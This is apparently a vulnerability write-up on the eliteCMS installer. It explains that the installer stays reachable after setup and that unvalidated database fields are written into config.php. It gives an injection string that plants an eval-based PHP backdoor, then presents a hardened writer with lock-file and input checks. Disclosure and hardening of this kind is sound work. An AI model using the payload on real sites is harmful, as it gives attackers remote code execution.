After installation finishes, the eliteCMS installer is not locked, so an attacker can rerun the installation just by visiting the installer's URL.
Another vulnerability: the installer can be made to write a one-line PHP backdoor straight into admin/includes/config.php.
Let's look at the code:

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ... (omitted) ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // the session values are interpolated directly into the generated PHP source
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "    die(\"Database connection failed\" .mysql_error());\n";
    $write .= "    \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "    die(\"Database select failed\" .mysql_error());\n";
    $write .= "    \n";
    $write .= "} \n";
    $write .= "?>\n";
    $writer = fopen($file, 'w');
...

Now look at this code:
// the POST values are stored in the session with no checks at all
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are used without any validation. If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor is written into /admin/includes/config.php.
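A hardened version of the step-4 writer, added here as an example (not eliteCMS's own code): it refuses to run once an install lock file exists, validates the POSTed host, database and user names, and emits every value through var_export() so the string is written as a quoted PHP literal and can never close the string or the PHP block. The lock-file path install.lock and the function names are assumptions.

```php
<?php
// Hardened replacement for the installer's step-4 writer (added example, not eliteCMS code).
// Assumed: config path ../admin/includes/config.php, lock file ../admin/includes/install.lock.

function installIsLocked(string $lockFile): bool
{
    return file_exists($lockFile);
}

// Host, database and user names: letters, digits, '_', '.', '-', ':' (host:port), max 64 chars.
// Anything that could close a string or a PHP block ('"', '?>', ...) is rejected outright.
function isSafeIdentifier(string $value): bool
{
    return strlen($value) <= 64 && preg_match('/^[A-Za-z0-9_.\-:]+$/', $value) === 1;
}

function buildConfig(array $db): string
{
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        // var_export() yields a single-quoted PHP literal with ' and \ escaped,
        // so the value stays data, never code, even if it contains "?>" or quotes.
        $out .= 'define(' . var_export($key, true) . ', ' . var_export($db[$key], true) . ");\n";
    }
    return $out; // no closing ?> so stray whitespace cannot leak into the output
}

function writeConfig(string $file, string $lockFile, array $post): void
{
    if (installIsLocked($lockFile)) {
        http_response_code(403);
        exit('Installer is locked; remove the lock file to reinstall.');
    }
    $db = [];
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER'] as $key) {
        $value = (string) ($post[$key] ?? '');
        if (!isSafeIdentifier($value)) {
            http_response_code(400);
            exit("Invalid value for $key");
        }
        $db[$key] = $value;
    }
    $db['DB_PASS'] = (string) ($post['DB_PASS'] ?? ''); // any characters, escaped by var_export()
    if (file_put_contents($file, buildConfig($db), LOCK_EX) === false) {
        exit('Could not write config file');
    }
    touch($lockFile); // lock the installer as soon as the config exists
}
writeConfig('../admin/includes/config.php', '../admin/includes/install.lock', $_POST);
```

Deleting the installer directory after setup removes the remaining exposure entirely; the lock file only covers the case where it is left in place.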